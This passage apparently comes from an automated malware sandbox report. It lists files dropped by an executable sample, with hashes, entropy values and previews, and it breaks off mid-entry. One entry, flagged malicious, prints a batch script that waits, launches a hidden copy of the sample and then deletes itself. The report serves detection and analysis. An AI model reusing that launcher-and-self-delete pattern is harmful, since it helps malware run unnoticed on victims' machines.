                                                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):64
                                                                                                                                    Entropy (8bit):1.1510207563435464
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:@...e................................................@..........

                                                                                                                                    C:\Users\user\AppData\Local\Temp\2057exvhHc

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):98304
                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\3zUipu98QK

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\75DJw7GE1X

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40960
                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):180
                                                                                                                                    Entropy (8bit):5.326797283812452
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQC3yRsrs/X62dAZBktKcKZG1t+kiE2J5xAI4q:hCRLuVFOOr+DE1WD50rsfxAZKOZG1wku
                                                                                                                                    MD5:B133C07E7A46B24F0C44C751D441ADF7
                                                                                                                                    SHA1:5F1F5BBD52FE3B147D8150C57C1B5C4F222EEB8C
                                                                                                                                    SHA-256:364D3B584C5CD3B90DA3DC1E9B68632F911D44452CBBB383DD39EBF3E1859BE1
                                                                                                                                    SHA-512:08C32EDFC13E1D2DC9B0B10E7F6F06ABCCB63CB384E7911270BE08F6FCE4B23E87D7F1101FBBA78F8CB056D592C77835894E6FB2F4131876F8FC6CFA42577464
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\9x00cPKFqM.bat"

                                                                                                                                    C:\Users\user\AppData\Local\Temp\Pb5xjMs33D

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40960
                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\RESCC57.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Fri Apr 19 12:52:07 2024, 1st section name ".debug$S"
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1956
                                                                                                                                    Entropy (8bit):4.553278669032398
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:HAO9/OgtUtDfHfwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:ogyxIKhmMluOulajfqXSfbNtmh1Z
                                                                                                                                    MD5:5AE6667D997C3CABAE086CECF18E85CA
                                                                                                                                    SHA1:099F1CEE880D43B40C22680D91B26867092ACBBD
                                                                                                                                    SHA-256:96724EB587574A98D270384C67C73C136B7092E73D3A65D8DE61E202DD4D486E
                                                                                                                                    SHA-512:75B190710A516EA2490B1BAD275E2AB28616E2E4535CE6E04C1FA196DD00DE15E559CAC208C30FA7624A9CE90CC4EBDCE1544972561260CFA8259F8478821FB7
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:L....h"f.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESCC57.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                                                                    C:\Users\user\AppData\Local\Temp\XrKvE5hfPM

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):106496
                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2g2o2osm.o0n.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bb51dkf.43m.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_452rxwrt.slr.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb1b35gc.bgp.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_glqq45wj.e3f.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlcv2gup.4ee.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpxfhqb0.p1l.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndo2rr3d.4oj.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odq1ty54.v1v.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5bczs5f.cf2.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_px3ssoqz.d2i.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxgfgttg.q14.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vox513b2.3am.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvcy4t00.g5s.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wa5hpfyo.eyh.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
